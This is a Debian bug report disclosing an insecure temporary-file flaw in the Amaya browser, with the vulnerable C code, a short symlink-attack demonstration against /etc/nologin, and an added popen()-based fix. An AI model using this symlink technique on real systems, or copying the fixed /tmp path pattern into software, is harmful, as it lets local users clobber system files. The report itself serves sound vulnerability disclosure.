Package: amaya
Version: 9.54~dfsg.0-1
Severity: important
The Amaya package contains the following code inside
amaya-9.51/Amaya/thotlib/unicode/ustring.c:
{
  int fd;
  char buffer[256];

  memset (buffer, 0, 256);
  /* ask the system using locale command */
  /* fixed, predictable path in the world-writable /tmp: the shell's > redirect follows whatever is already at /tmp/locale */
  system ("locale -ck LC_MESSAGES | grep messages-codeset | sed 's/.*=\"//' | sed 's/\"//' > /tmp/locale");
  fd = open ("/tmp/locale", O_RDONLY);
This can be abused to allow arbitrary files to be created, or truncated,
when a user runs the browser, as this session shows:
# check there are no files, then create an evil symlink
[EMAIL PROTECTED]:~$ ls -l /etc/nologin /tmp/locale
ls: /etc/nologin: No such file or directory
ls: /tmp/locale: No such file or directory
[EMAIL PROTECTED]:~$ ln -s /etc/nologin /tmp/locale
# wait for root to run the application
[EMAIL PROTECTED]:~$ sudo -s
[EMAIL PROTECTED]:~# amaya
# see the file
[EMAIL PROTECTED]:~# ls /etc/nologin
/etc/nologin
[EMAIL PROTECTED]:~# cat /etc/nologin
UTF-8
Obviously this example relies upon root to run the application and linking
to /etc/passwd would trash the system.
I guess the solution is to generate a secure temporary filename with
mktemp, mkstemp, or similar.
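The following is an added example, not Amaya's own code or a patch from the report. Rather than a safer temporary filename, it removes the temporary file altogether: the locale command's output is read through popen() and the grep/sed matching is done in C. It assumes `locale -ck LC_MESSAGES` prints a messages-codeset= line, as glibc's does.

```c
/* Added example, not Amaya's code: read the LC_MESSAGES codeset with no temp
 * file.  Assumes a line of the form messages-codeset="UTF-8" (glibc output). */
#ifndef _POSIX_C_SOURCE
#define _POSIX_C_SOURCE 200809L          /* for popen()/pclose() */
#endif
#include <stdio.h>
#include <string.h>

/* Replaces `grep messages-codeset | sed ...`: on a matching line, copy the
 * value (minus surrounding quotes) into out.  Returns 1 on match, else 0. */
int parse_codeset_line(const char *line, char *out, size_t outlen)
{
    static const char key[] = "messages-codeset=";
    size_t n;
    if (strncmp(line, key, sizeof key - 1) != 0)
        return 0;
    line += sizeof key - 1;
    if (*line == '"')                    /* opening quote, if present */
        line++;
    n = strcspn(line, "\"\r\n");         /* value ends at quote or EOL */
    if (n == 0 || n >= outlen)           /* empty, or would not fit */
        return 0;
    memcpy(out, line, n);
    out[n] = '\0';
    return 1;
}

/* Scan a stream line by line; this takes the place of open("/tmp/locale"). */
int read_codeset_from_stream(FILE *fp, char *out, size_t outlen)
{
    char line[256];
    while (fgets(line, sizeof line, fp) != NULL)
        if (parse_codeset_line(line, out, outlen))
            return 1;
    return 0;
}

/* The fix: pipe the command's stdout straight into this process.  No path in
 * /tmp is ever written, so a pre-planted symlink has nothing to redirect. */
int read_messages_codeset(char *out, size_t outlen)
{
    FILE *fp = popen("locale -ck LC_MESSAGES", "r");
    int found;
    if (fp == NULL)
        return 0;
    found = read_codeset_from_stream(fp, out, outlen);
    pclose(fp);
    return found;
}
```

Call read_messages_codeset(buf, sizeof buf) where the original code opened /tmp/locale; a return of 0 means the codeset is unknown and the caller should fall back to a default.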
-- System Information:
Debian Release: lenny/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 2.6.18-xen (SMP w/2 CPU cores)
Locale: LANG=en_GB.UTF-8, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/bash
Versions of packages amaya depends on:
ii amaya-data 9.54~dfsg.0-1 Web Browser, HTML Editor and Testb
ii libc6 2.5-11 GNU C Library: Shared libraries
ii libexpat1 1.95.8-3.4 XML parsing C library - runtime li
ii libfreetype6 2.2.1-6 FreeType 2 font engine, shared lib
ii libgcc1 1:4.2-20070627-1 GCC support library
ii libgl1-mesa-glx [libgl1 6.5.2-5 A free implementation of the OpenG
ii libglu1-mesa [libglu1] 6.5.2-5 The OpenGL utility library (GLU)
ii libjpeg62 6b-13 The Independent JPEG Group's JPEG
ii libpng12-0 1.2.15~beta5-2 PNG library - runtime
ii libraptor1 1.4.15-3 Raptor RDF parser and serializer l
ii libstdc++6 4.2-20070627-1 The GNU Standard C++ Library v3
ii libwww-ssl0 5.4.0-11 The W3C-WWW library (SSL support)
ii libwxbase2.6-0 2.6.3.2.1.5 wxBase library (runtime) - non-GUI
ii libwxgtk2.6-0 2.6.3.2.1.5 wxWidgets Cross-platform C++ GUI t
ii ttf-freefont 20060501cvs-12 Freefont Serif, Sans and Mono True
ii zlib1g 1:1.2.3.3.dfsg-3 compression library - runtime
Versions of packages amaya recommends:
pn amaya-doc <none> (no description available)
-- no debconf information
Steve